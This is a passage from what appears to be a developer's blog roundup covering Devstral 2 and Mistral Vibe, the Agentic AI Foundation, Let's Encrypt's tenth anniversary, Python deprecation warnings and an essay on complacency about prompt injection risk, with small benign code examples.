
uv run pytest

The new dev dependency group defined in pyproject.toml is automatically installed by uv run in a new virtual environment which means everything needed to run pytest is available without needing to add any extra commands.

The Normalization of Deviance in AI. This thought-provoking essay from Johann Rehberger directly addresses something that I’ve been worrying about for quite a while: in the absence of any headline-grabbing examples of prompt injection vulnerabilities causing real economic harm, is anyone going to care?

Johann describes the concept of the “Normalization of Deviance” as directly applying to this question.

Coined by Diane Vaughan, the key idea here is that organizations that get away with “deviance” - ignoring safety protocols or otherwise relaxing their standards - will start baking that unsafe attitude into their culture. This can work fine… until it doesn’t. The Space Shuttle Challenger disaster has been partially blamed on this class of organizational failure.

As Johann puts it:

In the world of AI, we observe companies treating probabilistic, non-deterministic, and sometimes adversarial model outputs as if they were reliable, predictable, and safe.

Vendors are normalizing trusting LLM output, but current understanding violates the assumption of reliability.

The model will not consistently follow instructions, stay aligned, or maintain context integrity. This is especially true if there is an attacker in the loop (e.g indirect prompt injection).

However, we see more and more systems allowing untrusted output to take consequential actions. Most of the time it goes well, and over time vendors and organizations lower their guard or skip human oversight entirely, because “it worked last time.”

This dangerous bias is the fuel for normalization: organizations confuse the absence of a successful attack with the presence of robust security.

10 Years of Let’s Encrypt (via) Internet Security Research Group co-founder and Executive Director Josh Aas:

On September 14, 2015, our first publicly-trusted certificate went live. [...] Today, Let’s Encrypt is the largest certificate authority in the world in terms of certificates issued, the ACME protocol we helped create and standardize is integrated throughout the server ecosystem, and we’ve become a household name among system administrators. We’re closing in on protecting one billion web sites.

Their growth rate and numbers are wild:

In March 2016, we issued our one millionth certificate. Just two years later, in September 2018, we were issuing a million certificates every day. In 2020 we reached a billion total certificates issued and as of late 2025 we’re frequently issuing ten million certificates per day.

According to their stats the amount of Firefox traffic protected by HTTPS doubled from 39% at the start of 2016 to ~80% today. I think it's difficult to over-estimate the impact Let's Encrypt has had on the security of the web.

Devstral 2. Two new models from Mistral today: Devstral 2 and Devstral Small 2 - both focused on powering coding agents such as Mistral's newly released Mistral Vibe which I wrote about earlier today.

- Devstral 2: SOTA open model for code agents with a fraction of the parameters of its competitors and achieving 72.2% on SWE-bench Verified.

- Up to 7x more cost-efficient than Claude Sonnet at real-world tasks.

Devstral 2 is a 123B model released under a janky license - it's "modified MIT" where the modification is:

You are not authorized to exercise any rights under this license if the global consolidated monthly revenue of your company (or that of your employer) exceeds $20 million (or its equivalent in another currency) for the preceding month. This restriction in (b) applies to the Model and any derivatives, modifications, or combined works based on it, whether provided by Mistral AI or by a third party. [...]

Devstral Small 2 is under a proper Apache 2 license with no weird strings attached. It's a 24B model which is 51.6GB on Hugging Face and should quantize to significantly less.

I tried out the larger model via my llm-mistral plugin like this:

llm install llm-mistral

llm mistral refresh



llm -m mistral/devstral-2512 "Generate an SVG of a pelican riding a bicycle"

For a ~120B model that one is pretty good!

Here's the same prompt with -m mistral/labs-devstral-small-2512 for the API hosted version of Devstral Small 2:

Again, a decent result given the small parameter size. For comparison, here's what I got for the 24B Mistral Small 3.2 earlier this year.

Agentic AI Foundation. Announced today as a new foundation under the parent umbrella of the Linux Foundation (see also the OpenJS Foundation, Cloud Native Computing Foundation, OpenSSF and many more).

The AAIF was started by a heavyweight group of "founding platinum members" ($350,000): AWS, Anthropic, Block, Bloomberg, Cloudflare, Google, Microsoft, and OpenAI. The stated goal is to provide "a neutral, open foundation to ensure agentic AI evolves transparently and collaboratively".

Anthropic have donated Model Context Protocol to the new foundation, OpenAI donated AGENTS.md, Block donated goose (their open source, extensible AI agent).

Personally the project I'd like to see most from an initiative like this one is a clear, community-managed specification for the OpenAI Chat Completions JSON API - or a close equivalent. There are dozens of slightly incompatible implementations of that not-quite-specification floating around already; it would be great to have a written spec accompanied by a compliance test suite.
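To illustrate the kind of check a compliance suite could contain, here's a minimal sketch of a validator for a Chat Completions-style response. The function is hypothetical, and the choice of which fields to treat as required (choices, message.role, content or tool_calls, finish_reason) is my assumption based on commonly seen responses, not a rule from any written spec.

```python
def check_chat_completion(response):
    """Return a list of problems found in a Chat Completions-style response.

    Hypothetical checker: it only looks at a handful of widely used fields.
    """
    choices = response.get("choices")
    if not isinstance(choices, list) or not choices:
        return ["'choices' must be a non-empty list"]

    problems = []
    for i, choice in enumerate(choices):
        message = choice.get("message") if isinstance(choice, dict) else None
        if not isinstance(message, dict):
            problems.append(f"choices[{i}].message must be an object")
            continue
        if message.get("role") != "assistant":
            problems.append(f"choices[{i}].message.role must be 'assistant'")
        if "content" not in message and "tool_calls" not in message:
            problems.append(f"choices[{i}].message needs 'content' or 'tool_calls'")
        if "finish_reason" not in choice:
            problems.append(f"choices[{i}] is missing 'finish_reason'")
    return problems
```

Running the same set of checks against each provider's output is one way the "slightly incompatible" differences could be made visible.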

mistralai/mistral-vibe. Here's the Apache 2.0 licensed source code for Mistral's new "Vibe" CLI coding agent, released today alongside Devstral 2.

It's a neat implementation of the now standard terminal coding agent pattern, built in Python on top of Pydantic and Rich/Textual (here are the dependencies). Gemini CLI is TypeScript, Claude Code is closed source (TypeScript, now on top of Bun), and OpenAI's Codex CLI is Rust. OpenHands is the other major Python coding agent I know of, but I'm likely missing some others. (UPDATE: Kimi CLI is another open source Apache 2 Python one.)

The Vibe source code is pleasant to read and the crucial prompts are neatly extracted out into Markdown files. Some key places to look:

- core/prompts/cli.md is the main system prompt ("You are operating as and within Mistral Vibe, a CLI coding-agent built by Mistral AI...")

- core/prompts/compact.md is the prompt used to generate compacted summaries of conversations ("Create a comprehensive summary of our entire conversation that will serve as complete context for continuing this work...")

- Each of the core tools has its own prompt file:

The Python implementations of those tools can be found here.

I tried it out and had it build me a Space Invaders game using three.js with the following prompt:

make me a space invaders game as HTML with three.js loaded from a CDN

Here's the source code and the live game (hosted in my new space-invaders-by-llms repo). It did OK.

Prediction: AI will make formal verification go mainstream (via) Martin Kleppmann makes the case for formal verification languages (things like Dafny, Nagini, and Verus) to finally start achieving more mainstream usage. Code generated by LLMs can benefit enormously from more robust verification, and LLMs themselves make these notoriously difficult systems easier to work with.

The paper Can LLMs Enable Verification in Mainstream Programming? by JetBrains Research in March 2025 found that Claude 3.5 Sonnet saw promising results for the three languages I listed above.

Deprecations via warnings don’t work for Python libraries (via) Seth Larson reports that urllib3 2.6.0, released on the 5th of December, finally removed the HTTPResponse.getheaders() and HTTPResponse.getheader(name, default) methods, which have been marked as deprecated via warnings since v2.0.0 in April 2023. They had to add them back again in a hastily released 2.6.1 a few days later when it turned out major downstream dependents such as kubernetes-client and fastly-py still hadn't upgraded.

Seth says:

My conclusion from this incident is that DeprecationWarning in its current state does not work for deprecating APIs, at least for Python libraries. That is unfortunate, as DeprecationWarning and the warnings module are easy-to-use, language-"blessed", and explicit without impacting users that don't need to take action due to deprecations.

On Lobste.rs James Bennett advocates for watching for warnings more deliberately:

Something I always encourage people to do, and try to get implemented anywhere I work, is running Python test suites with -Wonce::DeprecationWarning. This doesn't spam you with noise if a deprecated API is called a lot, but still makes sure you see the warning so you know there's something you need to fix.

I didn't know about the -Wonce option - the documentation describes that as "Warn once per Python process".
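Here's a small sketch of how the different filter actions behave, using the warnings module directly rather than the command-line flag. LegacyResponse and count_warnings are hypothetical names invented for this example, not anything from urllib3. The "ignore" case mimics what Python does by default for DeprecationWarning raised outside of `__main__`, which is a big part of why these warnings go unnoticed.

```python
import warnings


class LegacyResponse:
    """Hypothetical stand-in for a class with a deprecated method."""

    def __init__(self, headers):
        self.headers = headers

    def getheaders(self):
        warnings.warn(
            "getheaders() is deprecated; use the headers attribute instead",
            DeprecationWarning,
            stacklevel=2,  # attribute the warning to the caller
        )
        return self.headers


def count_warnings(action, calls=3):
    """Call the deprecated method `calls` times under one filter action
    and return how many warnings were actually recorded."""
    response = LegacyResponse({"content-type": "text/html"})
    with warnings.catch_warnings(record=True) as caught:
        warnings.simplefilter(action, DeprecationWarning)
        for _ in range(calls):
            response.getheaders()
    return len(caught)
```

In a fresh process, count_warnings("ignore") records nothing, count_warnings("always") records all three calls and count_warnings("once") records just one. The "once" bookkeeping is kept per process, so asking for "once" a second time with the same message in the same process would record nothing.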

Niche Museums: The Museum of Jurassic Technology. I finally got to check off the museum that's been top of my want-to-go list since I first started documenting niche museums I've been to back in 2019.

The Museum of Jurassic Technology opened in Culver City, Los Angeles in 1988 and has been leaving visitors confused as to what's real and what isn't for nearly forty years.

Using LLMs at Oxide (via) Thoughtful guidance from Bryan Cantrill, who evaluates applications of LLMs against Oxide's core values of responsibility, rigor, empathy, teamwork, and urgency.